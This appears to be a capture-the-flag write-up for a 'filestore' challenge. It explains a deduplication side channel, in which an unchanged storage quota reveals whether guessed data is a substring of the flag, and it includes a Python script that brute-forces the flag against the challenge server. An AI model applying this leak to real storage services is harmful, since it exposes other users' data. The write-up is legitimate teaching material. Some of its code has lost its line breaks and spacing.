We stored our flag on this platform, but forgot to save the id. Can you help us restore it?
Analysis
When running the program, we have 4 options.
➜ Google ./filestore.py
Welcome to our file storage solution.
Menu:
- load
- store
- status
- exit
Let's first look at the source code for saving and loading files.
First, all data is stored in blob:
# It's a tiny server...blob =bytearray(2**16)files ={}used =0
The storing of data works through deduplication. I've added some comments to the source code to make it more understandable:
# Use deduplication to save space.defstore(data):nonlocal used MINIMUM_BLOCK =16 MAXIMUM_BLOCK =1024 part_list = []while data: prefix = data[:MINIMUM_BLOCK] ind =-1 bestlen, bestind =0,-1# Find the best 'matching' part of the blobwhileTrue: ind = blob.find(prefix, ind+1)if ind ==-1:break length =len(os.path.commonprefix([data, bytes(blob[ind:ind+MAXIMUM_BLOCK])]))if length > bestlen: bestlen, bestind = length, ind# Store the index of the match if bestind !=-1: part, data = data[:bestlen], data[bestlen:] part_list.append((bestind, bestlen))# Append to the endelse: part, data = data[:MINIMUM_BLOCK], data[MINIMUM_BLOCK:] blob[used:used+len(part)]= part part_list.append((used, len(part))) used +=len(part)assert used <=len(blob) fid ="".join(secrets.choice(string.ascii_letters+string.digits) for i inrange(16)) files[fid]= part_listreturn fid
Each 'file' is essentially represented by indices on the blob bytearray. If the new data is a duplicate of existing data, then no new data is stored onto the bytearray. Instead, the file is represented by an index pointing to the duplicated data.
For the purposes of analysis, we can print the first few bytes of blob and the part_list.
Here's an example:
➜ Google ./filestore.pyWelcome to our file storage solution.# Saving the flag into the blobbytearray(b'testflag\x00\x00')[(0,8)]Menu:- load- store- status-exitstoreSend me a line of data...test# Duplicated data at index 0bytearray(b'testflag\x00\x00')[(0,4)]Stored! Here's your file id:tObXrn5TRAMIGl6W
Now, if we look at the status command, we see that the 'Quota' represents the used space in the blob bytearray. Since duplicated data was stored, the quota remains at 0.008kB.
This is very helpful to us - it allows us to check whether the data we are storing is a substring of the flag. If it is a substring, then the quota should remain the same. Otherwise, new data is stored and the used quota increases.
Solving
This observation allows us to do a fairly trivial check for which characters are found in the flag. By sending each possible character and checking the quota value afterwards, we can confirm whether or not that character is found in the flag.
But how do we get the flag? Checking each possible permutation of these valid characters would take too long, but we can reduce the time complexity by checking valid 2-character permutations, then combine these to check for valid 4-character permutations, and so on. This reduces the total number of permutations we have to check since it eliminates a lot of possible permutations early on.
from itertools import productvalid_n_chars ={1: valid}LEN_FLAG =26i =2while i <= LEN_FLAG: result = [] permutations = [''.join(x)for x inproduct(valid_n_chars[i //2], repeat =2)] num_permutations =len(permutations) count =0for permutation in permutations: flag =''.join(permutation)print(f"Trying {flag}...") conn =remote('filestore.2021.ctfcompetition.com', 1337) conn.recv() conn.send('store\r\n') conn.recv() conn.send(f'{flag}\r\n') conn.recvuntil('Menu') conn.send('status\r\n') received = conn.recvuntil('Menu').decode() match = re.search(r'Quota: (.+)/64.000kB', received) quota = match[1]if quota == target_quota:print(f"{flag} works!") result.append(flag) conn.close()if count %10==0:print('Progress:', count / num_permutations) count +=1 valid_n_chars[i]= result i *=2print('Valid results:', result)
This eventually outputs all valid 16-character substrings of the flag.
From here, we can reconstruct the flag: CTF{CR1M3_0f_d3dup1ic4ti0n}